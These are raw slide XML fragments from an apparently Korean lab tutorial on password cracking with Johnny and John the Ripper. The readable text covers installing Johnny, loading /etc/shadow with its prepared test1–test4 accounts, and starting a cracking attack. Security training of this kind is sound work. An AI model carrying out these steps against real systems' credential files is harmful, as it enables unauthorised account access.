          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Johnny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는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John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과 다르게 따로 설치를 해줘야 한다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  <a:p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Apt-get install johnny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명령어로 설치해준다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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D27BB759-A2E4-4898-8677-2D18B0D3F7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171" y="3539842"/>
            <a:ext cx="6222997" cy="1997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100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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>개인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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54368A39-9C11-4587-BB5C-6230868CAE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836" y="2656823"/>
            <a:ext cx="6075281" cy="5629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1973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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Johnny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를 설치하고 나면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john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과 같이</a:t>
            </a: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메뉴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– 05-Password Attacks</a:t>
            </a:r>
          </a:p>
          <a:p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에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Johnny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가 보인다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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DBFC1B4E-78DA-43DC-8396-8943A5B2C2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380" y="1755126"/>
            <a:ext cx="5958930" cy="5115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4537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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Johnny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에 들어간 모습이다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  <a:p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왼쪽 위의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File – Open password file(PASSWD format)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에 들어가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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/shadow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파일이나 소유하고 있는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shadow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파일을 선택한다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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C53B0197-AE58-4FA8-BEA2-EB0BA605E4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129" y="2976656"/>
            <a:ext cx="6266366" cy="3539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8046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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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Shadow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파일을 불러온 모습이다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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3D71B869-77FD-4B75-B3EF-2FE1BCEEC9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98" y="3091161"/>
            <a:ext cx="6270891" cy="340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7845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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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추가놓은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test1 ~ test4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계정의 패스워드 항목이 보이지 않는 모습이다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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4F484F15-E81A-42D7-95C4-BE44710748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958" y="4568070"/>
            <a:ext cx="6128084" cy="76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0133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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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Johnny &amp; John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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왼쪽 위의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Attacks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메뉴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– Start new attack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을 눌러 패스워드 복호화를 실행해준다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
